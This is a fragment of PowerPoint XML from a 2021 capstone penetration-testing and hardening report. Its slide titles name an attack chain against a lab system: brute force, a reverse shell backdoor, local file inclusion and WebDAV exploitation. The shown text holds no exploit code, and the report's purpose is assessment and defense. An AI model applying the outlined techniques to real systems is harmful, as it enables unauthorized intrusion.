                        <a:rPr lang="en-CA" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Arial"/>
                        </a:rPr>
                        <a:t>WebDAV Vulnerability</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100" i="0" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Exploit WebDAV on a server and Shell access is possible.</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100" i="1" dirty="0">
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>If WebDAV is not configured properly, it can allow hackers to remotely modify website content.</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EB48CC80-9D4C-49D2-84C5-A0816E830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23920720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1623</TotalTime>
  <Words>3950</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>576</Paragraphs>
  <Slides>38</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Wingdings</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System  Prepared by: Ketan Vithal Patel August 2021</vt:lpstr>
      <vt:lpstr>Table of Contents </vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment - (Continued)</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment - (Continued)</vt:lpstr>
      <vt:lpstr>Exploitation: Open Web Port (80) CVE-2019-6579 </vt:lpstr>
      <vt:lpstr>Exploitation: Open Web Port (80) CVE-2019-6579 (Continued) </vt:lpstr>
      <vt:lpstr>Exploitation: Brute-force Attack</vt:lpstr>
      <vt:lpstr>Exploitation: Brute-force Attack (Continued)</vt:lpstr>
      <vt:lpstr>Exploitation: Reverse Shell Backdoor CVE-2019-13386</vt:lpstr>
      <vt:lpstr>Exploitation: Local File Inclusion (LFI) CVE-2021-31783</vt:lpstr>
      <vt:lpstr>Exploitation: WebDAV Vulnerability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   Appendix : Exploit Reconstruction – Code and Resources</vt:lpstr>
      <vt:lpstr>Appendix : Exploit Reconstruction – Code and Resources</vt:lpstr>
      <vt:lpstr>Appendix : Exploit Reconstruction – Code and Resources</vt:lpstr>
      <vt:lpstr>Appendix : Exploit Reconstruction – Code and Resources</vt:lpstr>
      <vt:lpstr>Appendix : Exploit Reconstruction – Code and Resources</vt:lpstr>
      <vt:lpstr>Appendix : Exploit Reconstruction – Code and Resources</vt:lpstr>
      <vt:lpstr>Appendix : Exploit Reconstruction – Code and Resources</vt:lpstr>
      <vt:lpstr>Assessment Summary</vt:lpstr>
      <vt:lpstr>Assessment Summary</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  Ketan Vithal Patel</dc:title>
  <dc:creator>Ketan Vithal Patel</dc:creator>
  <cp:lastModifiedBy>Ketan Vithal Patel</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-21T13:55:42Z</dcterms:modified>
</cp:coreProperties>
</file>